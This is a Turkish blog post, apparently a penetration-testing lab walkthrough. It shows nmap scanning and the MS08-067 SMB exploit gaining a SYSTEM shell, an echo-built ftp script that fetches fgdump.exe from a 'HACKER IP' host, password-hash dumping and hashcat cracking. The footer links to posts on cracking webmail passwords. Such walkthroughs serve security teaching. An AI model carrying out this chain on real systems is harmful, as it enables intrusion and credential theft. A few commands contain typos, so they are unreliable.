Sızma Testi Senaryosu - Bölüm 3

Merhabalar,

Diğer makalelerimdede dediğim gibi elimden geldiğince sızma testi senaryoları hazırlayıp burada post geçeceğimi söylemiştim. Bugun ki senaryomuzda bir sistemi nasıl ele geçirebilir ve içeri nasıl dosya atarız bundan bahsedeceğim..

İlk olarak nmap ile şu şekilde “nmap –sS ”x.x.x.x” (-sS parametresini anlamı, Syn taraması yapılacagı anlamına gelir.)" tarama yapılmalıdır. (2 tane açık port bırakılmıştır portlar üzerinde bir analiz yapılması gerekmektedir.)
445 portunda bir zafiyet olup olmadıgını test etmek için “nmap –script smb-vuln-ms08-067.nse –p455 ” şeklinde tarama yapılır. Görüldüğü gibi ms08-067 zafiyeti bulunmaktadır.
445 portunda “MS08-67_netapi” zafiyet olduğu tespit ettik şimdi ise Sistemi ele geçirmek için gerekli exploiti “ https://www.exploit-db.com/exploits/7132/ “ adresinden indirilir.
Ardından ise exploit’in indirilmiş oldugu dizine gidilir “ python exploitismi.py <ID( ıd numarasını kodun içerisinden görebilirsiniz)> şeklinde çalıştırılır. “ 1 “ ID’si Win 2000 server’lar için, “2“ ID’si 2003 server’lar için. Çalıştırıldıktan sonra ise en aşağıdaki yazı üzerinden yani “ telnet 4444” yazan kısım üzerinden ilerlenir.
Komut satırına “telnet IP (PORT)” şeklinde yazılır ve shell satırına giriş yapılır.
Sisteme erişim sağlandığında SYSTEM haklarına sahip oldugumuz görülür bu nedenle hak yükseltme ihtiyacı yoktur. "net user" komutu ile sistem üzerindeki kullanıcılar listelenir. Bir server işletim sistemi olduğu için kullanıcı bilgileri değerli olabilir, bu nedenle kullanıcı parolalarını almak işe yarayabilir. Passwordleri DUMP etmek için "fgdump.exe" aracını kullanabiliriz. Bu dosyayı sistemimize yüklemek için ftp yöntemini kullanacagız.

Öncelikle kali linux üzerine bir ftp serivi kurulur ve anonim erişime izin verilir. Bu ftp içerisinde fgdump.exe dosyayı konulur.
Windows komut satırı ftp bağlantısına shell üzerinden izin vermeyecektir. Bu nedenle kullanacağımız aracı otomatik olarak indirmeye çalışacağız.
Bu işlem için ftp komutlarını içeren bir txt dosyayı oluşturuyoruz, veya sistem üzerinde olan bir txt dosyası varsa onun üzerinede yazabiliriz.

echo open "HACKER IP" >> ftp.txt
echo USER anonymous >>ftp.txt
echo bin >>ftp.txt
echo get fgdump.exe >>ftp.txt
echo bye >>ftp.txt

Şimdi ise aşağıdaki komut ile ftp otomatik olarak bağlantı kuracak ve fgdump.exe dosyasını indirecektir.

ftp -v -n -s:ftp.txt -s parametresinden sonra txt içerisindeki komutlar otomatik olarak çalışacaktır.

indirilen fgdump.exe dosayını çalıştırıyoruz.

Son olarak "dir" komutu ile çıktıları inceliyoruz, buradan "type" komutu ile "127.0.0.1.pwdump" dosyasını açıyoruz "type 127.0.0.1.pwdump" şeklinde. Ve görüldüğü gibi kullanıcı hashleri görüntülenmektedir. Hashlerin hangi algoritmada olduğunu öğrenmek için hash-identifier aracı kullanılabilir.
Şimdi ise hashcat aracı ile parola kırma adımına geçiyoruz. Bunun için bir terminal satırı açıp “hashchat –m 1000 –a 1 /root/hashdosyası.txt /usr/share/wordlists/fasttrack.txt “ şeklinde komutlarını kullanarak parola kırma işlemini başlatıyoruz. –m parametresi hash türünü belirlemektedir. Burada NTLM(1000) veya Domain Credential (1100) seçilebilir.
Güvenli Günler

Yorumlar

Bu blogdaki popüler yayınlar

Hydra İle BruteForce Attack Yaparak Nasil Hotmail/Gmail/Yahoo Şifreleri Kırılır ( Hacking )

MS17-010 Zafiyetiden Faydalanarak Domain Controller Ele Geçirme

Sızma Testi Senaryosu - Bölüm 1